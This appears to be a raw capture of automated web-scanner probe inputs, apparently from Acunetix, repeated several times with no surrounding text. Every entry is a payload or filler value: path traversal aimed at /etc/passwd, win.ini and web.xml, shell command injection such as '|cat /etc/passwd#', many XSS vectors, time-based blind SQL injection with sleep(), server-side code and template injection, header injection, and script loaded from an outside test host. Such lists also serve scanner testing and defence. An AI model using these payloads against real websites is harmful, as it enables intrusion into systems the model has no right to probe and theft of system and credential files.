
1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

1&lt

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n913394=v985271

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

'|'ld

1

\xf6<img acu onmouseover=prompt(918094) //\xf6>

PJgUAVpO'

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1<input autofocus onfocus=prompt(985201)>

EvqoElPk')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1

/etc/passwd

^(#$!@#$)(()))******

aIt0QY6X'))

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

1

"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1

'

1

1

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1_03gKy <ScRiPt >prompt(995088)</ScRiPt>

-1)

http://hitUH9TAW8Rom.bxss.me/

"

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

-1))

1

||cat /etc/passwd

comments

1

1

1

9CEadl4k'

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

&dir

file:///etc/passwd

1

cyZioXHI')

1

http://www.acunetix.tst

1

1

'"

comments/.

/\../\../\../\../\../\../\../etc/passwd

'&dir&'

1

1'"()&%<ScRiPt >prompt(907232)</ScRiPt>

slBlFhQM'))

1

1

1

<!--

"&dir&"

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(990185)</ScRiPt>

1

1

1_964317

1

WEB-INF\web.xml

|dir

1

1

1

1

1

../../../../../../../../../../windows/win.ini

acu7817\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7817

'|dir

1

1

1

../../../../../../../../../../boot.ini

acux8728\xc0\xbez1\xc0\xbcz2a\x90bcxuca8728

1

"|dir

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(944474)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(992238)</script>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(904730)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?950176></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<ScRiPt >prompt(950713)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(919005)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998633)"></g></svg>

1

1

1

1<div style=width:expression(prompt(971510))>

1

WEB-INF/web.xml

response.write(9506713*9872681)

1

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

&cat /etc/passwd&

'+response.write(9506713*9872681)+'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937657)>

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

"+response.write(9506713*9872681)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(979824)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(6.874),0)/*'XOR(if(now()=sysdate(),sleep(6.874),0))OR'"XOR(if(now()=sysdate(),sleep(6.874),0))OR"*/

1

1<img src=xyz OnErRor=prompt(948432)>

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd.jpg

1

1

1<img/src=">" onerror=alert(923337)>

(select(0)from(select(sleep(6.874)))v)/*'+(select(0)from(select(sleep(6.874)))v)+'"+(select(0)from(select(sleep(6.874)))v)+"*/

1

${100065+99361}

1

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<ScRiPt%20>prompt(998195)</sCripT>

-1

1

1

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n989471=v920502

1&lt

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1

|cat /etc/passwd#

/../..//../..//../..//../..//../..//etc/passwd.jpg

\xf6<img acu onmouseover=prompt(988039) //\xf6>

1

1some_inexistent_file_with_long_name%00.jpg

-1))

1

!(()&&!|*|*|

1

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<input autofocus onfocus=prompt(962802)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

AGcnAWRf'

1

^(#$!@#$)(()))******

1

1

testasp.vulnweb.com

<a href='http://www.acunetix.com'>website security</a>

"|"ld

/etc/passwd

'

obf9zj9z')

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

wKnjd52k'))

"

1

1

1_VkeOb <ScRiPt >prompt(944290)</ScRiPt>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

-1

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

"

1

${@print(md5(acunetix_wvs_security_test))}\

-1)

http://hitZ2OqG7dT9d.bxss.me/

acunetix_wvs_invalid_filename

1

1

1

||cat /etc/passwd

-1))

1

1

comments

1

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

qxwyZ0xi'

1

http://www.acunetix.tst

comments

'"

1'"()&%<ScRiPt >prompt(977417)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'&dir&'

comments/.

OvLKFuM8')

1

<!--

'"()&%<ScRiPt >prompt(936705)</ScRiPt>

WEB-INF/web.xml

1

1

"&dir&"

1

fUYhcIZ3'))

1

WEB-INF\web.xml

1_969970

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1

acu1981\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1981

1

1

'|dir

../../../../../../../../../../boot.ini

1

acux5210\xc0\xbez1\xc0\xbcz2a\x90bcxuca5210

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(910071)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<script>prompt(988870)</script>

1

1

................windowswin.ini

1<ScRiPt >prompt(936597)</ScRiPt>

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?981950></ScRiPt>

1

1

1

1<ScRiPt >prompt(946063)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(996175)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974919)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<div style=width:expression(prompt(953435))>

1

1

1

1

WEB-INF/web.xml

response.write(9581969*9259747)

1<iframe src='data:text/html

'+response.write(9581969*9259747)+'

&cat /etc/passwd&

WEB-INF\web.xml

1

1<body onload=prompt(932957)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

"+response.write(9581969*9259747)+"

'&cat /etc/passwd&'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935931)>

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

1<img src=xyz OnErRor=prompt(919462)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(932896)>

-1

1

${99553+99584}

1

1

1

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt%20>prompt(910786)</sCripT>

-1)

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

1&n910025=v977659

-1))

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

1

\xf6<img acu onmouseover=prompt(940668) //\xf6>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

A8B5ary4'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

"|"ld

1<input autofocus onfocus=prompt(935070)>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

MMPdRdAw')

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

'"()

<a href='http://www.acunetix.com'>website security</a>

^(#$!@#$)(()))******

'

/etc/passwd

1

3Ijhu8Us'))

1

1

'

1

[url=http://www.acunetix.com]website security[/url]

1

"

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

1

1

1_Rl3hN <ScRiPt >prompt(943370)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}

-1)

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

http://hitpTFODN36yu.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

&dir

1

1

1

comments

vAq462nc'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

1

1

'&dir&'

CCOtOm0F')

http://www.acunetix.tst

1

1

'"

file:///etc/passwd

1

1

1'"()&%<ScRiPt >prompt(965014)</ScRiPt>

"&dir&"

PIpEhZJn'))

1

1

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

'"()&%<ScRiPt >prompt(966649)</ScRiPt>

1

1

1

1_931177

WEB-INF/web.xml

1

'|dir

1

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

acu2252\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2252

1

1

1

../../../../../../../../../../boot.ini

1

acux7441\xc0\xbez1\xc0\xbcz2a\x90bcxuca7441

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(995407)</ScRiPt>

1

1

1<script>prompt(958666)</script>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(909568)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?948773></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(976350)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(948354)">

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(998351)"></g></svg>

1

response.write(9479384*9616041)

1

1<div style=width:expression(prompt(930112))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9479384*9616041)+'

1<iframe src='data:text/html

&cat /etc/passwd&

1

"+response.write(9479384*9616041)+"

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(990093)>

../../../../../../../../../../etc/passwd

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973242)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=xyz OnErRor=prompt(976601)>

1

1

`cat /etc/passwd`

-1

1

1

1

1

1<img/src=">" onerror=alert(916059)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99102+100412}

|cat /etc/passwd#

-1)

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt%20>prompt(906277)</sCripT>

1

1

1&n999419=v969543

-1))

'|'ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

1

sRb9UZzj'

1

"|"ld

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

\xf6<img acu onmouseover=prompt(984721) //\xf6>

1

!(()&&!|*|*|

icBRerjL')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'"()

1<input autofocus onfocus=prompt(967319)>

/etc/passwd

1

^(#$!@#$)(()))******

'

oJiHJCKX'))

1

testasp.vulnweb.com

'

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

[url=http://www.acunetix.com]website security[/url]

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1_e8tEY <ScRiPt >prompt(924602)</ScRiPt>

||cat /etc/passwd

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

acunetix_wvs_invalid_filename

http://hitzskVJTuke0.bxss.me/

1

&dir

1

1

1

XyDxm3Jp'

comments

1

1

1

'&dir&'

1

file:///etc/passwd

1

"&dir&"

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

pUG06j8N')

1

http://www.acunetix.tst

1

'"

/\../\../\../\../\../\../\../etc/passwd

KExQAiFP'))

comments/.

|dir

1'"()&%<ScRiPt >prompt(974216)</ScRiPt>

1

1

1

WEB-INF/web.xml

<!--

1

1

1

'|dir

'"()&%<ScRiPt >prompt(944073)</ScRiPt>

WEB-INF\web.xml

1

1

1

1

1_911470

"|dir

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu5284\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5284

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux9551\xc0\xbez1\xc0\xbcz2a\x90bcxuca9551

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(942121)</ScRiPt>

1

1

1

1

1<script>prompt(953105)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(991041)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?929326></ScRiPt>

1

1

1

1<ScRiPt >prompt(992669)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(959055)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936716)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<div style=width:expression(prompt(990732))>

1

response.write(9453164*9896926)

1

1

WEB-INF/web.xml

&cat /etc/passwd&

1

1

1<iframe src='data:text/html

'+response.write(9453164*9896926)+'

WEB-INF\web.xml

'&cat /etc/passwd&'

1<body onload=prompt(996913)>

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9453164*9896926)+"

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929202)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(940749)>

cat /etc/passwd

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

1<img/src=">" onerror=alert(996954)>

1

`cat /etc/passwd`

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<ScRiPt%20>prompt(989485)</sCripT>

1

|cat /etc/passwd#

1

${99019+100396}

'|'ld

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&lt

1

1

"|"ld

1

1

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n929037=v952644

\xf6<img acu onmouseover=prompt(973550) //\xf6>

)

CVyoO3jz'

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1<input autofocus onfocus=prompt(918759)>

!(()&&!|*|*|

'"()

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

'

dHtpV5kD')

/etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

<a href='http://www.acunetix.com'>website security</a>

1

testasp.vulnweb.com

JlBXW6De'))

"

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}

-1

1

1

1

1

http://hitRlTFqfBpuu.bxss.me/

1_2mq6E <ScRiPt >prompt(908066)</ScRiPt>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

${@print(md5(acunetix_wvs_security_test))}\

-1)

acunetix_wvs_invalid_filename

1

1

1

1

1

1

'&dir&'

-1))

comments

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

"&dir&"

file:///etc/passwd

Z0vzzOsi'

comments

1

1

1

1

http://www.acunetix.tst

|dir

1

'"

comments/.

1'"()&%<ScRiPt >prompt(978263)</ScRiPt>

xuHVPEiF')

/\../\../\../\../\../\../\../etc/passwd

1

1

1

'|dir

BhysWsUh'))

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(988102)</ScRiPt>

<!--

1

1

"|dir

1

1

1_966420

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acu8279\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8279

1

acux4290\xc0\xbez1\xc0\xbcz2a\x90bcxuca4290

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(904581)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(930255)</script>

1

1

1<ScRiPt >prompt(930367)</ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984228></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(984018)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(976230)">

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(950002)"></g></svg>

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(954777))>

1

1

1

1<iframe src='data:text/html

1

response.write(9337187*9058188)

1

1

1<body onload=prompt(974422)>

WEB-INF/web.xml

1

'+response.write(9337187*9058188)+'

1

&cat /etc/passwd&

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(917306)>

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9337187*9058188)+"

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(927641)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img/src=">" onerror=alert(946002)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

1<ScRiPt%20>prompt(926456)</sCripT>

1

-1

${99854+99617}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

`cat /etc/passwd`

1&lt

-1)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

|cat /etc/passwd#

1

1&n924200=v938561

\xf6<img acu onmouseover=prompt(983922) //\xf6>

)

-1))

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<input autofocus onfocus=prompt(900070)>

'|'ld

1

1

!(()&&!|*|*|

Zi8KXGbr'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

<a href='http://www.acunetix.com'>website security</a>

1

"|"ld

oruARZkY')

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

[url=http://www.acunetix.com]website security[/url]

testasp.vulnweb.com

1

'"()

1

bYyh40x5'))

'

/etc/passwd

1_pLOM9 <ScRiPt >prompt(995980)</ScRiPt>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

1

"

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1))

1

1

http://hit8BFmHBVXgO.bxss.me/

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

2nNQ4BIo'

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

comments

http://www.acunetix.tst

xKAi8uaZ')

1

1

1

1

file:///etc/passwd

'&dir&'

1

'"

comments

1

eqkRUn9o'))

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(975779)</ScRiPt>

<!--

1

"&dir&"

comments/.

1

1

1

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(966066)</ScRiPt>

|dir

1

1

1

1

1

WEB-INF\web.xml

'|dir

1

1_997147

1

1

1

../../../../../../../../../../windows/win.ini

"|dir

1

1

acu7594\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7594

1

../../../../../../../../../../boot.ini

1

1

1

acux3497\xc0\xbez1\xc0\xbcz2a\x90bcxuca3497

1

1<ScRiPt >prompt(941456)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(962000)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(927900)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?964224></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(916248)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(963331)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(964734)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(978282))>

1

response.write(9650543*9929277)

1

1

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

'+response.write(9650543*9929277)+'

1

1

1<body onload=prompt(916554)>

'&cat /etc/passwd&'

1

"+response.write(9650543*9929277)+"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(980767)>

WEB-INF/web.xml

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd

1<img src=xyz OnErRor=prompt(975315)>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

cat /etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1<img/src=">" onerror=alert(900892)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

